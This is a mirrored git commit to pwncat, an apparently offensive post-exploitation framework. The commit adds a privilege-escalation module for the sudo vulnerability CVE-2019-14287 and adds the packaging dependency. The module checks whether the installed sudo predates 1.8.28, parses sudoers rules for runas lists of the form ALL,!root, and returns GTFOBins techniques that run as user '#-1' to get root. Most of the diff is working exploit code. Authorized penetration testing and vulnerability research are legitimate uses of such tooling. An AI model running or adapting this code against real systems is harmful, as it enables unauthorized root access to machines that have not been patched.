mirror of
https://github.com/calebstewart/pwncat.git
synced 2024-11-30 12:24:14 +01:00
Added sudo CVE-2019-14287 escalation
This commit is contained in:
parent
1cc6d4ad27
commit
c6b084b50f
72
pwncat/modules/escalate/cve2019-14287.py
Normal file
72
pwncat/modules/escalate/cve2019-14287.py
Normal file
@ -0,0 +1,72 @@
|
||||
#!/usr/bin/env python3
|
||||
|
||||
import pwncat
|
||||
from pwncat.gtfobins import Capability, Stream, BinaryNotFound
|
||||
from pwncat.modules.escalate import (
|
||||
EscalateModule,
|
||||
EscalateError,
|
||||
GTFOTechnique,
|
||||
Technique,
|
||||
)
|
||||
|
||||
from packaging import version
|
||||
|
||||
class Module(EscalateModule):
|
||||
"""
|
||||
Escalate to root using CVE-2019-14287 sudo vulnerability.
|
||||
"""
|
||||
|
||||
def enumerate(self):
|
||||
""" Enumerate SUDO vulnerability """
|
||||
|
||||
sudo_fixed_version = '1.8.28'
|
||||
|
||||
try:
|
||||
# Check the sudo version number
|
||||
sudo_version = pwncat.victim.enumerate.first("system.sudo_version")
|
||||
except FileNotFoundError:
|
||||
return
|
||||
|
||||
if version.parse(sudo_version.data.version) >= version.parse(sudo_fixed_version):
|
||||
# Patched version, no need to check privs
|
||||
return
|
||||
|
||||
rules = []
|
||||
for fact in pwncat.modules.run("enumerate.sudoers"):
|
||||
|
||||
# Doesn't appear to be a user specification
|
||||
if not fact.data.matched:
|
||||
continue
|
||||
|
||||
# This specifies a user that is not us
|
||||
if (
|
||||
fact.data.user != "ALL"
|
||||
and fact.data.user != pwncat.victim.current_user.name
|
||||
and fact.data.group is None
|
||||
):
|
||||
continue
|
||||
|
||||
# Check if we are part of the specified group
|
||||
if fact.data.group is not None:
|
||||
for group in pwncat.victim.current_user.groups:
|
||||
if fact.data.group == group.name:
|
||||
break
|
||||
else:
|
||||
# Non of our secondary groups match, was our primary group specified?
|
||||
if fact.data.group != pwncat.victim.current_user.group.name:
|
||||
continue
|
||||
|
||||
# The rule appears to match, add it to the list
|
||||
rules.append(fact.data)
|
||||
|
||||
for rule in rules:
|
||||
userlist = [x.strip() for x in rule.runas_user.split(',')]
|
||||
if "ALL" in userlist and "!root" in userlist:
|
||||
for command in rule.commands:
|
||||
for method in pwncat.victim.gtfo.iter_sudo(
|
||||
command, caps=Capability.ALL
|
||||
):
|
||||
yield GTFOTechnique("root", self, method, user="\\#-1", spec=command)
|
||||
|
||||
def human_name(self, tech: "Technique"):
|
||||
return f"[cyan]{tech.method.binary_path}[/cyan] ([red]sudo CVE-2019-14287[/red])"
|
@ -13,6 +13,7 @@ lark-parser==0.7.8
|
||||
mbstrdecoder==1.0.0
|
||||
msgfy==0.1.0
|
||||
netifaces==0.10.9
|
||||
packaging==20.4
|
||||
git+https://github.com/calebstewart/paramiko
|
||||
pathvalidate==2.3.0
|
||||
pprintpp==0.4.0
|
||||
|
Loading…
Reference in New Issue
Block a user